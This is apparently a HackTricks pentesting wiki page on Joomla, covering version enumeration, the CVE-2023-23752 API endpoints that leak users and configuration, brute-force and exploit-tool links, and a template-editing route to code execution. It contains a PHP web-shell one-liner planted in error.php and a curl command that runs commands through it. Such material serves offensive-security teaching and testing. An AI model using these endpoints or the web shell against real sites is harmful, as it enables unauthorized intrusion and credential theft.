search
githubEdit

Joomla

circle-check

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)arrow-up-right Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)arrow-up-right

chevron-rightSupport HackTrickshashtag

hashtag
Joomla Statistics

Joomla collects some anonymous usage statisticsarrow-up-right such as the breakdown of Joomla, PHP and database versions and server operating systems in use on Joomla installations. This data can be queried via their public APIarrow-up-right.

curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

{
    "data": {
        "cms_version": {
            "3.0": 0,
            "3.1": 0,
            "3.10": 6.33,
            "3.2": 0.01,
            "3.3": 0.02,
            "3.4": 0.05,
            "3.5": 12.24,
            "3.6": 22.85,
            "3.7": 7.99,
            "3.8": 17.72,
            "3.9": 27.24,
            "4.0": 3.21,
            "4.1": 1.53,
            "4.2": 0.82,
            "4.3": 0,
            "5.0": 0
        },
        "total": 2951032
    }
}

hashtag
Enumeration

hashtag
Discovery/Footprinting

  • Check the meta

  • robots.txt

  • README.txt

hashtag
Version

  • In /administrator/manifests/files/joomla.xml you can see the version.

  • In /language/en-GB/en-GB.xml you can get the version of Joomla.

  • In plugins/system/cache/cache.xml you can see an approximate version.

hashtag
Automatic

In 80,443 - Pentesting Web Methodology is a section about CMS scanners that can scan Joomla.

hashtag
API Unauthenticated Information Disclosure:

Versions From 4.0.0 to 4.2.7 are vulnerable to Unauthenticated information disclosure (CVE-2023-23752) that will dump creds and other information.

  • Users: http://<host>/api/v1/users?public=true

  • Config File: http://<host>/api/index.php/v1/config/application?public=true

MSF Module: scanner/http/joomla_api_improper_access_checks or ruby script: 51334arrow-up-right

hashtag
Brute-Force

You can use this scriptarrow-up-right to attempt to brute force the login.

hashtag
RCE

If you managed to get admin credentials you can RCE inside of it by adding a snippet of PHP code to gain RCE. We can do this by customizing a template.

  1. Click on Templates on the bottom left under Configuration to pull up the templates menu.

  2. Click on a template name. Let's choose protostar under the Template column header. This will bring us to the Templates: Customise page.

  3. Finally, you can click on a page to pull up the page source. Let's choose the error.php page. We'll add a PHP one-liner to gain code execution as follows:

    1. system($_GET['cmd']);

  4. Save & Close

  5. curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id

hashtag
From XSS to RCE

  • JoomSploitarrow-up-right: Joomla Exploitation Script that elevate XSS to RCE or Others Critical Vulnerabilities. For more info check this postarrow-up-right. It provides support for Joomla Versions 5.X.X, 4.X.X, and 3.X.X, and allows to:

    • Privilege Escalation: Creates an user in Joomla.

    • (RCE) Built-In Templates Edit: Edit a Built-In Templates in Joomla.

    • (Custom) Custom Exploits: Custom Exploits for Third-Party Joomla Plugins.

circle-check

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)arrow-up-right Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)arrow-up-right

chevron-rightSupport HackTrickshashtag
PreviousJira & ConfluenceNextJSP

Last updated